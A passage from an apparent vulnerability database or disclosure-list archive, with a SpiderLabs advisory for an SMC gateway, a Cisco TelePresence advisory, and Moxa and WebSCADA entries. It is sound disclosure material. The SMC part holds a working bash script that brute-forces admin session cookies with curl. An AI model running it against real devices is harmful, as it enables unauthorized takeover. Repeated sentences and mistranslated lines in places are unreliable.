admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0386 | No CVE | Moxa Device Manager 'MDMUtil.dll' Remote Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Moxa Device Manager is a remote management tool for Moxa's embedded computers. The \"MDMUtil.dll\" module has a boundary error when processing certain messages, tempting the user to link to a malicious MDM gateway to trigger a stack-based buffer overflow. Successful exploitation of a vulnerability can execute arbitrary instructions in an application security context. Failed exploit attempts will result in a denial-of-service condition
| VAR-201102-0225 | CVE-2011-0385 | Cisco TelePresence Recording Server and Cisco TelePresence Multipoint Switch Vulnerability in |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. The problem is Bug IDs CSCth85786 and CSCth61065 It is a problem.A third party could create or overwrite arbitrary files and execute arbitrary code through crafted requests. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. Unauthenticated remote attackers can send trait requests to affected devices, allowing arbitrary content files to be created anywhere on the device. To exploit this vulnerability, an attacker could send a specially crafted request to the devices TCP ports 80 and 443. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary files on the webserver.
This issue is tracked by Cisco bug IDs CSCth85786 and CSCth61065. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. The Cisco TelePresence implementation does not properly filter user-supplied input. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco
TelePresence Recording Server
Advisory ID: cisco-sa-20110223-telepresence-ctrs
Revision 1.0
For Public Release 2011 February 23 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Multiple vulnerabilities exist within the Cisco TelePresence
Recording Server. The defect
that is related to each component is covered in each associated
advisory. The defect
that is related to each component is covered in each associated
advisory. The defect that is related to each component is
covered in each associated advisory. The defect that
is related to each component is covered in each associated advisory.
All releases of Cisco TelePresence software prior to 1.7.1 are
affected by one or more of the vulnerabilities listed in this
advisory.
To determine the current version of software that is running on the
Cisco TelePresence Recording Server, SSH into the device and issue the
show version active and the show version inactive commands. The
output should resemble the following example:
admin: show version active
Active Master Version: 1.7.0.0-151
Active Version Installed Software Options:
No Installed Software Options Found.
admin: show version inactive
Inactive Master Version: 1.6.2.0-237
Inactive Version Installed Software Options:
No Installed Software Options Found.
In the preceding example, the system has versions 1.6.2 and 1.7.0
loaded on the device and version 1.7.0 is currently active. A device
is affected only by vulnerabilities that are present in the active
software version.
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The Cisco TelePresence solution allows for immersive, in-person
communication and collaboration over the network with colleagues,
prospects, and partners even when they are located in opposite
hemispheres. These vulnerabilities are
independent of each other.
Unauthenticated Java Servlet Access
+----------------------------------
A number of sensitive Java Servlets delivered via a Java Servlet
framework within the Cisco TelePresence Recording Server could allow
a remote, unauthenticated attacker to perform actions that should be
restricted to administrative users.
* Cisco TelePresence Recording Server - CSCtf42005 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0383.
* Cisco TelePresence Recording Server - CSCtf97221 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0382.
* Cisco TelePresence Recording Server - CSCth85786 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0385. This vulnerability could be leveraged to obtain full
control of the affected device.
* Cisco TelePresence Recording Server - CSCti50739 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0386. This vulnerability could allow
an unauthenticated, adjacent attacker to trigger a buffer overflow
condition.
Because Cisco Discovery Protocol works at the data-link layer (Layer
2), an attacker must have a way to submit an Ethernet frame directly
to an affected device. This may be possible in situations where the
affected system is part of a bridged network or connected to a
nonpartitioned device such as a network hub.
* Cisco TelePresence Recording Server - CSCtd75769 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0379.
Ad Hoc Recording Denial of Service
+---------------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices. A restart of the affected
device may be required to regain functionality.
* Cisco TelePresence Recording Server - CSCtf97205 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0391.
Java RMI Denial of Service
+-------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices due to a failure to properly restrict access
to the RMI interface of the Java Servlet framework. An
unauthenticated, remote attacker could trigger an out-of-memory
condition on the Servlet host by issuing a series of crafted
requests.
* Cisco TelePresence Recording Server - CSCtg35830 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0388. This vulnerability could allow an
unauthenticated, remote attacker to perform a limited number of
actions on the system that should be restricted to authorized users.
* Cisco TelePresence Recording Server - CSCtg35833 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0392.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Cisco Security Advisory is done in accordance with
CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss.
* CSCtf42005 - Unauthenticated Java Servlet Access
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97221 - CGI Command Injection
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCth85786 - Unauthenticated Arbitrary File Upload
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCti50739 - XML-RPC Arbitrary File Overwrite
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtd75769 - Cisco Discovery Protocol Remote Code Execution
CVSS Base Score - 7.9
Access Vector - Adjacent Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 6.5
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97205 - Ad Hoc Recording Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35830 - Java RMI Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35833 - Unauthenticated XML-RPC Interface
CVSS Base Score - 7.5
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Partial
CVSS Temporal Score - 6.2
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the Unauthenticated Java Servlet Access
(CSCtf42005) vulnerability could allow an unauthenticated, remote
attacker to take complete control of the affected device or system. This may allow the attacker to gain full control of the
affected device. In some instances
this issue could be leveraged to gain complete control of the
affected system.
Successful exploitation of the Cisco Discovery Protocol Remote Code
Execution (CSCtd75769) vulnerability could allow an unauthenticated,
adjacent attacker to take complete control of the affected system.
Successful exploitation of the Ad Hoc Recording Denial of Service
(CSCtf97205) vulnerability could allow an unauthenticated, remote
attacker to cause a persistent denial of service condition on an
affected device.
Successful exploitation of the Java RMI Denial of Service
(CSCtg35830) vulnerability could allow an unauthenticated, remote
attacker to cause all web-based services to become inaccessible.
Successful exploitation of the Unauthenticated XML-RPC Interface
(CSCtg35833) vulnerability could allow an unauthenticated, remote
attacker to perform a number of actions that should be restricted to
authenticated users.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the following Cisco TelePresence System Software table
defines a specific defect, the first fixed release, and the
recommended release to resolve all the security issues identified in
this advisory as well as other non-security-related issues. Cisco
recommends upgrading to a release equal to or later than the release
in the Recommended Release column of the table.
Workarounds
===========
There are no device- or system-based workarounds for the identified
vulnerabilities.
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Intelligence companion
document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20110223-telepresence.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone numbers,
and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
All vulnerabilities identified within this Security Advisory were
discovered internally by Cisco.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110223-telepresence-ctrs.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-February-23 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iF4EAREIAAYFAk1lHp0ACgkQQXnnBKKRMNDi6gD9FHcn7qE/BjeRZk7WFzDaN7m/
+eea5C4SM6kS1uQK5DoA/152WnbmatSGw6hJP/e2MSmWOqU1IKU5oxZOO8uqrShf
=xAVI
-----END PGP SIGNATURE-----
.
Revision History
================
+----------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-February-23 | public |
| | | release
| VAR-201102-0182 | CVE-2010-4741 |
Moxa Device Manager MDMTool.exe Buffer Overflow Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201011-0390 |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in MDMUtil.dll in MDMTool.exe in MDM Tool before 2.3 in Moxa Device Manager allows remote MDM Gateways to execute arbitrary code via crafted data in a session on TCP port 54321.
An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions
| VAR-201102-0174 | CVE-2010-4733 | WebSCADA Multiple Product Weak Password Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 There are multiple vulnerabilities in products that run on the platform, including directory traversal. Other NB100 and NB200 Products that run on the platform may also be affected.By a third party with access to the product, superadmin Authority (Netbiter Top-level permissions ) By acquiring, system files and configuration files may be browsed. In addition, an arbitrary command may be executed by uploading malicious code. A remote attacker can gain access to the super administrator through the web interface
| VAR-201102-0197 | CVE-2010-4730 | WebSCADA Multiple products cgi-bin/read.cgi Directory Traversal Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Contains a directory traversal vulnerability
| VAR-201102-0173 | CVE-2010-4732 | WebSCADA Multiple products cgi-bin/read.cgi Remote code execution vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to execute arbitrary code by using a config.html 2.conf action to replace the logo page's GIF image file with a file containing this code, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is A vulnerability that allows arbitrary code execution exists